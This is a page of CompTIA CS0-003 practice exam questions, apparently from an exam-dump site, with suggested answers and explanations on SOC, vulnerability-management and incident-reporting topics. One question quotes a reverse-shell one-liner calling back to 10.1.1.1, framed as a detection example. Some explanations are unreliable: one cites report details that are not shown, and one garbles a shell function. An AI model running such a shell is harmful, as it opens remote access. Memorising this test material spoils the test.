ExamGecko
Home Home / CompTIA / CS0-003

CompTIA CS0-003 Practice Test - Questions Answers, Page 6

Question list
Search
Search

List of questions

Search

Related questions











A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

A.
SLA
A.
SLA
Answers
B.
MOU
B.
MOU
Answers
C.
NDA
C.
NDA
Answers
D.
Limitation of liability
D.
Limitation of liability
Answers
Suggested answer: A

Explanation:

SLA stands for service level agreement, which is a contract or document that defines the expectations and obligations between a service provider and a customer regarding the quality, availability, performance, or scope of a service. An SLA may also specify the metrics, penalties, or remedies for measuring or ensuring compliance with the agreed service levels. An SLA can help the SOC manager review if the team is meeting the appropriate contractual obligations for the customer, such as response time, resolution time, reporting frequency, or communication channels.

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

A.
Command and control
A.
Command and control
Answers
B.
Actions on objectives
B.
Actions on objectives
Answers
C.
Exploitation
C.
Exploitation
Answers
D.
Delivery
D.
Delivery
Answers
Suggested answer: A

Explanation:

Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 enables the adversary to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or networks.

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

A.
External
A.
External
Answers
B.
Agent-based
B.
Agent-based
Answers
C.
Non-credentialed
C.
Non-credentialed
Answers
D.
Credentialed
D.
Credentialed
Answers
Suggested answer: B

Explanation:

Agent-based vulnerability scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based vulnerability scanning can reduce network traffic, as the scans are performed locally and only the results are transmitted over the network. Agent-based vulnerability scanning can also provide more accurate and up-to-date results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

A.
RCE
A.
RCE
Answers
B.
Reverse shell
B.
Reverse shell
Answers
C.
XSS
C.
XSS
Answers
D.
SQL injection
D.
SQL injection
Answers
Suggested answer: B

Explanation:

A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user's system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

This command is a shell script that creates a reverse shell connection from the target system to the remote user's system at IP address 10.1.1.1 and port 4821 using UDP protocol.

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

A.
Scope
A.
Scope
Answers
B.
Weaponization
B.
Weaponization
Answers
C.
CVSS
C.
CVSS
Answers
D.
Asset value
D.
Asset value
Answers
Suggested answer: B

Explanation:

Weaponization is a factor that describes how an adversary develops or acquires an exploit or payload that can take advantage of a vulnerability and deliver a malicious effect. Weaponization can increase the severity or impact of a vulnerability, as it makes it easier or more likely for an attacker to exploit it successfully and cause damage or harm. Weaponization can also indicate the level of sophistication or motivation of an attacker, as well as the availability or popularity of an exploit or payload in the cyber threat landscape. In this case, an older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. This indicates that weaponization was the reason for this escalation.

An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

A.
10.101.27.98
A.
10.101.27.98
Answers
B.
54.73.225.17
B.
54.73.225.17
Answers
C.
54.74.110.26
C.
54.74.110.26
Answers
D.
54.74.110.228
D.
54.74.110.228
Answers
Suggested answer: D

Explanation:

The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as possible.

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?


A.
Credentialed network scanning
A.
Credentialed network scanning
Answers
B.
Passive scanning
B.
Passive scanning
Answers
C.
Agent-based scanning
C.
Agent-based scanning
Answers
D.
Dynamic scanning
D.
Dynamic scanning
Answers
Suggested answer: C

Explanation:

Agent-based scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based scanning can reduce the access to systems, as the agents do not require any credentials or permissions to scan the local system or network. Agent-based scanning can also provide the most accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

A.
function x() { info=$(geoiplookup $1) && echo '$1 | $info' }
A.
function x() { info=$(geoiplookup $1) && echo '$1 | $info' }
Answers
B.
function x() { info=$(ping -c 1 $1 | awk -F '/' 'END{print $5}') && echo '$1 | $info' }
B.
function x() { info=$(ping -c 1 $1 | awk -F '/' 'END{print $5}') && echo '$1 | $info' }
Answers
C.
function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F '.in-addr' '{print $1} ').origin.asn.cymru.com TXT +short) && echo '$1 | $info' }
C.
function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F '.in-addr' '{print $1} ').origin.asn.cymru.com TXT +short) && echo '$1 | $info' }
Answers
D.
function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo '$1 | $info' }
D.
function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo '$1 | $info' }
Answers
Suggested answer: C

Explanation:

The function that can be used on a shell script to identify anomalies on the network routing most accurately is:

function x() { info=(dig(dig -x $1 | grep PTR | tail -n 1 | awk -F ''.in-addr'' '{print $1} ').origin.asn.cymru.com TXT +short) && echo ''$1 | $info'' }

This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address. The function then prints the IP address and the ASN information, which can help identify any routing anomalies or inconsistencies

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

A.
Implement step-up authentication for administrators
A.
Implement step-up authentication for administrators
Answers
B.
Improve employee training and awareness
B.
Improve employee training and awareness
Answers
C.
Increase password complexity standards
C.
Increase password complexity standards
Answers
D.
Deploy mobile device management
D.
Deploy mobile device management
Answers
Suggested answer: B

Explanation:

The best security control to implement against sensitive information being disclosed via file sharing services is to improve employee training and awareness. Employee training and awareness can help educate employees on the risks and consequences of using file sharing services for sensitive information, as well as the policies and procedures for handling such information securely and appropriately. Employee training and awareness can also help foster a security culture and encourage employees to report any incidents or violations of information security.

Which of the following is the best way to begin preparation for a report titled 'What We Learned' regarding a recent incident involving a cybersecurity breach?

A.
Determine the sophistication of the audience that the report is meant for
A.
Determine the sophistication of the audience that the report is meant for
Answers
B.
Include references and sources of information on the first page
B.
Include references and sources of information on the first page
Answers
C.
Include a table of contents outlining the entire report
C.
Include a table of contents outlining the entire report
Answers
D.
Decide on the color scheme that will effectively communicate the metrics
D.
Decide on the color scheme that will effectively communicate the metrics
Answers
Suggested answer: A

Explanation:

The best way to begin preparation for a report titled ''What We Learned'' regarding a recent incident involving a cybersecurity breach is to determine the sophistication of the audience that the report is meant for. The sophistication of the audience refers to their level of technical knowledge, understanding, or interest in cybersecurity topics. Determining the sophistication of the audience can help tailor the report content, language, tone, and format to suit their needs and expectations. For example, a report for executive management may be more concise, high-level, and business-oriented than a report for technical staff or peers.

Total 368 questions
Go to page: of 37